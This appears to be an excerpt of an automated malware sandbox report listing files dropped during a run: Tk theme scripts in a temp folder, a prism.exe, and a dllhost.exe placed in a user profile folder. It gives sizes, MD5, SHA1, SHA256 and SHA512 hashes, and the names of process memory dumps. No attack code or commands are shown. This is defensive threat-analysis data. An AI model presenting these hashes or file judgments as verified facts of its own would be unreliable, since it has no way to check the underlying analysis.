123d78d6ac34af4833d05814220757dccf2a9af4761fe67a8fe5f67a0d258b3c8d86ed346176ffb936ab3717cfd75b4fab7373f7853d44fa356be6e3a75e51b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\clamTheme.tcl

Filesize
4KB

MD5
beced087eeb3d5c9b2eabdb19c030d52

SHA1
be285e65905d335be442606afa3a88e408d5ec5b

SHA256
93c29536262c582104bf1804d7b06c7565b7d621f2e3605ff8b6c981a3b4ab01

SHA512
84b733c3fbe63c32b5b1e6cd132bd1b55f07b47612b70455c17c4d6d239682672c838cc3d739283079d0d2d8567fca9b763465d8d2148d25b5952282ed521a79

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\classicTheme.tcl

Filesize
3KB

MD5
70f3edfbfd4c16febdd8311290a0effe

SHA1
4b1d63d59c72c357931a8cbbf071654492a9b371

SHA256
c7b1f40d77820fbaf2195f2bb3f334b38fec653fe47653f9e30a01ad4ca63ba5

SHA512
a58c584ada6d271316266d58641be260f98e6fa0ae867ee9e343807a2955ddd3544b864cca80dc7f164ed4be5331575b696650ff0bb469c3647c5cb122f2a64c

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\combobox.tcl

Filesize
11KB

MD5
06b885722c8555668bcbe8d7d9aa4c75

SHA1
8172c8886884de462549aa94fca440b99da90583

SHA256
057f8f447de3a753714b8f82b96054e1849a2424749f3482492eae192baacdcf

SHA512
d81ab53d48ed1d79da57fc2d2b599199ee985e237046244a2f820daacd2e8565c65d63e9b6f80175c30fd48290226a547d6d603293a4b7e4a455795f7fce7179

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\cursors.tcl

Filesize
3KB

MD5
74596004dfdbf2ecf6af9c851156415d

SHA1
933318c992b705bf9f8511621b4458ecb8772788

SHA256
7bdffa1c2692c5d1cf67b518f9acb32fa4b4d9936ed076f4db835943bc1a00d6

SHA512
0d600b21db67bf9dadbdd49559573078efb41e473e94124ac4d2551bc10ec764846dc1f7674daa79f8d2a8aeb4ca27a5e11c2f30ede47e3ecee77d60d7842262

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\defaults.tcl

Filesize
4KB

MD5
16843ecd9e716a87d865a6539ef44751

SHA1
3df76af0d6e4c386d63dd061100702dbb0f72a42

SHA256
d83248b535a9417ce0ca598bbe245f24252adc90e3611c1191a045d9c0a9c99f

SHA512
7f5e7a200fd6b012a9336035211d9d89f0504f61156629ebcc1a03bcf8462ba8d219de376b6bb3ebb9e6a9507f0ac6f7d658eed5b953110df553b3c0c44ebc1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\entry.tcl

Filesize
16KB

MD5
3dea98c515f6f731e666656da9708f12

SHA1
212865fc5c635eeca380efc1b3fbb85554714c47

SHA256
fe32f8b154893218acaba93ac4b8e1170d9b3e3ab66df63df85c0a31c17592be

SHA512
2901b5f92df95cbd1ec71acf86646af2f1d6058232eef1b5779192bad6df0bbbbc5902e363f809671f06d13270b1581d55f611556d48b1a843194477a113aeab

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\fonts.tcl

Filesize
5KB

MD5
7017b5c1d53f341f703322a40c76c925

SHA1
57540c56c92cc86f94b47830a00c29f826def28e

SHA256
0eb518251fbe9cf0c9451cc1fef6bb6aee16d62da00b0050c83566da053f68d0

SHA512
fd18976a8fbb7e59b12944c2628dbd66d463b2f7342661c8f67160df37a393fa3c0ce7fdda31073674b7a46e0a0a7d0a7b29ebe0d9488afd9ef8b3a39410b5a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\menubutton.tcl

Filesize
6KB

MD5
fe89894d8cbf415541a60d77192f0f94

SHA1
c0716b2d8e24592757b62d24eeed57121b60e00f

SHA256
d9af20135ef1bfeb3e0fd9fdabe821474de3ed43b3745a42fe564d24a8b9fd9c

SHA512
66488cbcac49cca47c9c560648e891d429f40e46549f58687b98073eba4807a8458a277be093ebfc50709a8a87a529df4e526eccfb60803ce16af17b97accd3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\notebook.tcl

Filesize
5KB

MD5
82c9dfc512e143dda78f91436937d4dd

SHA1
26abc23c1e0c201a217e3cea7a164171418973b0

SHA256
d1e5267cde3d7be408b4c94220f7e1833c9d452bb9ba3e194e12a5eb2f9adb80

SHA512
a9d3c04ad67e0dc3f1c12f9e21ef28a61fa84dbf710313d4ca656bdf35dfbbfba9c268c018004c1f5614db3a1128025d795bc14b4fffaa5603a5313199798d04

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\panedwindow.tcl

Filesize
1KB

MD5
a12915fa5caf93e23518e9011200f5a4

SHA1
a61f665a408c10419fb81001578d99b43d048720

SHA256
ce0053d637b580170938cf552b29ae890559b98eb28038c2f0a23a265ddeb273

SHA512
669e1d66f1223cca6ceb120914d5d876bd3cf401ee4a46f35825361076f19c7341695596a7dbb00d6cff4624666fb4e7a2d8e7108c3c56a12bda7b04e99e6f9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\progress.tcl

Filesize
1KB

MD5
b0074341a4bda36bcdff3ebcae39eb73

SHA1
d070a01cc5a787249bc6dad184b249c4dd37396a

SHA256
a9c34f595e547ce94ee65e27c415195d2b210653a9ffcfb39559c5e0fa9c06f8

SHA512
af23563602886a648a42b03cc5485d84fcc094ab90b08df5261434631b6c31ce38d83a3a60cc7820890c797f6c778d5b5eff47671ce3ee4710ab14c6110dcc35

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\scale.tcl

Filesize
2KB

MD5
b41a9df31924dea36d69cb62891e8472

SHA1
4c2877fbb210fdbbde52ea8b5617f68ad2df7b93

SHA256
25d0fe2b415292872ef7acdb2dfa12d04c080b7f9b1c61f28c81aa2236180479

SHA512
a50db6da3d40d07610629de45f06a438c6f2846324c3891c54c99074cfb7beed329f27918c8a85badb22c6b64740a2053b891f8e5d129d9b0a1ff103e7137d83

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\scrollbar.tcl

Filesize
2KB

MD5
cf7bc1ffbf3efee2ca7369215a3b1473

SHA1
e2632241089f9dc47fa76cd0c57615d70753008c

SHA256
b3a0e10c95b28c90cccfc373152bd30ab7da2fb4c0e96409aeeb01d453f36b4a

SHA512
01841cda93aa0ce1a5b1fc65db153902b872b7e9d1030ef8902e086bbeb35649fd742dd96d1aed9cf620692fde6f4e2ccd865dc7a125452ffd16a65918956dda

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\sizegrip.tcl

Filesize
2KB

MD5
3c8916a58c6ee1d61836e500a54c9321

SHA1
54f3f709698fad020a048668749cb5a09ede35ab

SHA256
717d2edd71076ea059903c7144588f8bbd8b0afe69a55cbf23953149d6694d33

SHA512
2b71569a5a96cac1b708e894a2466b1054c3fae5405e10799b182012141634bd2a7e9e9f516658e1a6d6e9e776e397608b581501a6cfe2eb4ec54459e9ecb267

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\spinbox.tcl

Filesize
4KB

MD5
ebce661f8125f54c7dff9f076fb2bfe2

SHA1
966603a85eadba4e003e8307a7e581cd6839716f

SHA256
7c2ffd7308bdea852851335d5b5eb5dcca0e4d4a0cea16f786b40009ffd58b71

SHA512
35f518e20986ab951ff33091f405ea1647534ccb77c8c36a94b1ab4a973df3ed52355864702b6526888830af8c912105e542027b5d68f81ac2a9f40ad2ba2632

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\treeview.tcl

Filesize
9KB

MD5
5bec78db1a86b4bc17a5108806c5371e

SHA1
4b2b08240f778864c5045f546a620702ae126ccb

SHA256
0e05adf29b616989cb4724e57a26f1044598781f0cc10d5eb5ac4af7d705ddca

SHA512
29dff439bb5caa23f8f38ea136406fa2db68be021068f80bad2e2ec811ae5c5b08f4f287719db946db780122af05654392ea771fb523bdc1569b364689d3ec86

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\ttk.tcl

Filesize
4KB

MD5
e38b399865c45e49419c01ff2addce75

SHA1
f8a79cbc97a32622922d4a3a5694bccb3f19decb

SHA256
61baa0268770f127394a006340d99ce831a1c7ad773181c0c13122f7d2c5b7f6

SHA512
285f520b648f5ec70dd79190c3b456f4d6da2053210985f9e2c84139d8d51908296e4962b336894ee30536f09fae84b912bc2abf44a7011620f66cc5d9f71a8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\utils.tcl

Filesize
8KB

MD5
f868a26a299885824b14ca28f68039ce

SHA1
e37a1889e6cc215102ec078d0455622415ed8486

SHA256
6c35cd6c7f3ac4be3fe0cc7633dbbde5123155921a441ba702b4347e6f967f34

SHA512
14d8fd30fe670ce4630ce5b7b1e4b04a2a3f97d6483d87d0d7a2b675e880ab75e947820a4babd337452d683e0cbb7b92b4c866af19a8dcd5711016e012d597e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\vistaTheme.tcl

Filesize
9KB

MD5
ad2d78020875529834dd0ea74251e2d3

SHA1
80cc99972a056396dd55e9505ccb02e16462b115

SHA256
ce1a53a769de9e230f586efafd2fb455980b45941e5db553bd3a2f0062b50f3e

SHA512
59ec21a44769fec0b462f0675217882ecf5cbc64056024e4259d91233a1397b4b89957bd474387c992a8753dc9c350fda7e6e5c6e9d29c655d62362a018e2194

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\winTheme.tcl

Filesize
2KB

MD5
8b4813a1c6915fd35b52ac854230bcc1

SHA1
db981087f2a311361446014fadbd8b199d856716

SHA256
05fad058280e7a8947a9f71122b442b92d7d578b4618b08bf0b71b6dac5aa22f

SHA512
e0a69e94aabd725b441d6c4920f1cd54451bcc00090d9319cb55286a46a7f35066d1959de149d900198f777671004f6d8a64e7d31e42f8a76e89ed122a79a9ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\xpTheme.tcl

Filesize
2KB

MD5
1026799ffe26aaa8661f64d6f2cbe4dd

SHA1
5cd337feb3130d146134e06c4a1826ba29157e7a

SHA256
ff421674388da5d3a0c687f342f8d1e3c7f247f3cb59d5512b31f91a54a4c318

SHA512
90f1062caa87c0d65aede1d71370ebe35ad90f4033e6077169b7168b4754c0ff46a9f6348f4d907dcf20ab8f63bb6e0d106a05f068c5abeb86d26f5ea00f503c

Download Submit
C:\Users\Admin\AppData\Local\Temp\prism.exe

Filesize
5.0MB

MD5
3c234d63acc712e09a6ed9a6da5687fe

SHA1
b755b122383a1c2fe1b4e4b6cba267b51a424cca

SHA256
e209fa6557cfe3d8d0ad23e32afbe0767609ce30765bd31362242fa34ea74728

SHA512
ccb03765f1dda8291cb1baf711d23b6f2d31b6d762cc295cd43e5e6422540839e5711488016698e12ac8793ecf7c4b6c8fe654b35efdb2166c86b588a68fdd41

Download Submit
C:\Users\Admin\dllhost.exe

Filesize
78KB

MD5
4a7f75343aaa5a4d8d18add50ccf3139

SHA1
110c62eee6d7deb4aa9d601c942eae43482d2125

SHA256
34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e

SHA512
1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

Download Submit
memory/1408-39-0x0000000073D2E000-0x0000000073D2F000-memory.dmp

Filesize
4KB

Download
memory/1408-926-0x0000000006040000-0x0000000006394000-memory.dmp

Filesize
3.3MB

Download
memory/1408-733-0x0000000005DF0000-0x0000000005E56000-memory.dmp

Filesize
408KB

Download
memory/1408-741-0x0000000005ED0000-0x0000000005F36000-memory.dmp

Filesize
408KB

Download
memory/1408-651-0x0000000005C20000-0x0000000005C42000-memory.dmp

Filesize
136KB

Download
memory/1408-345-0x0000000005570000-0x0000000005B98000-memory.dmp

Filesize
6.2MB

Download
memory/1408-218-0x0000000004F30000-0x0000000004F40000-memory.dmp

Filesize
64KB

Download
memory/1408-95-0x0000000004F30000-0x0000000004F40000-memory.dmp

Filesize
64KB

Download
memory/1408-1043-0x0000000006A00000-0x0000000006A1A000-memory.dmp

Filesize
104KB

Download
memory/1408-1042-0x0000000007AE0000-0x000000000815A000-memory.dmp

Filesize
6.5MB

Download
memory/1408-1044-0x0000000008710000-0x0000000008CB4000-memory.dmp

Filesize
5.6MB

Download
memory/1408-1045-0x00000000078A0000-0x0000000007932000-memory.dmp

Filesize
584KB

Download
memory/1408-990-0x00000000064E0000-0x000000000652C000-memory.dmp

Filesize
304KB

Download
memory/1408-106-0x0000000004EF0000-0x0000000004F26000-memory.dmp

Filesize
216KB

Download
memory/1408-989-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/2172-1112-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1113-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1110-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1104-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1106-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1105-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1116-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1115-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1114-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/2172-1111-0x000001FD61720000-0x000001FD61721000-memory.dmp

Filesize
4KB

Download
memory/3504-1048-0x00000237ED850000-0x00000237ED872000-memory.dmp

Filesize
136KB

Download
memory/3960-1254-0x000002089F750000-0x000002089F761000-memory.dmp

Filesize
68KB

Download
memory/3960-1256-0x000002089F7E0000-0x000002089F7F5000-memory.dmp

Filesize
84KB

Download
memory/3960-1255-0x000002089F790000-0x000002089F7A5000-memory.dmp

Filesize
84KB

Download
memory/4604-52-0x0000000000AD0000-0x0000000000AEA000-memory.dmp

Filesize
104KB

Download
memory/4604-42-0x00007FFA61823000-0x00007FFA61825000-memory.dmp

Filesize
8KB

Download
memory/4604-1098-0x00007FFA61823000-0x00007FFA61825000-memory.dmp

Filesize
8KB

Download
memory/4676-1252-0x000001D338190000-0x000001D3381A5000-memory.dmp

Filesize
84KB

Download
memory/4676-1253-0x000001D3381E0000-0x000001D3381F5000-memory.dmp

Filesize
84KB

Download
memory/4676-1251-0x000001D338150000-0x000001D338161000-memory.dmp

Filesize
68KB

Download